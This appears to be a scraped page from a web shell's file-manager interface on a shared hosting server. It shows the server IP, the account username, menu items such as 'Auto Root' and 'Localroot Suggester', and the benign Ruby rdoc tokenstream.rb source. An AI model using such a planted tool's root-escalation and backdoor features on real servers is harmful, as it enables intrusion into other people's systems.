Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 3.12.153.221
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby18 /
lib64 /
ruby /
1.8 /
rdoc /
Delete
Unzip
Name
Size
Permission
Date
Action
dot
[ DIR ]
drwxr-xr-x
2024-03-03 22:48
generators
[ DIR ]
drwxr-xr-x
2024-03-03 22:48
markup
[ DIR ]
drwxr-xr-x
2024-03-03 22:48
parsers
[ DIR ]
drwxr-xr-x
2024-03-03 22:48
ri
[ DIR ]
drwxr-xr-x
2024-03-03 22:48
code_objects.rb
18.03
KB
-rw-r--r--
2007-02-12 23:01
diagram.rb
11.91
KB
-rw-r--r--
2007-02-12 23:01
options.rb
17.02
KB
-rw-r--r--
2008-01-11 01:24
rdoc.rb
8.4
KB
-rw-r--r--
2007-02-12 23:01
template.rb
5.81
KB
-rw-r--r--
2007-02-12 23:01
tokenstream.rb
644
B
-rw-r--r--
2007-02-12 23:01
usage.rb
4.97
KB
-rw-r--r--
2007-02-12 23:01
Save
Rename
# A TokenStream is a list of tokens, gathered during the parse # of some entity (say a method). Entities populate these streams # by being registered with the lexer. Any class can collect tokens # by including TokenStream. From the outside, you use such an object # by calling the start_collecting_tokens method, followed by calls # to add_token and pop_token module TokenStream def token_stream @token_stream end def start_collecting_tokens @token_stream = [] end def add_token(tk) @token_stream << tk end def add_tokens(tks) tks.each {|tk| add_token(tk)} end def pop_token @token_stream.pop end end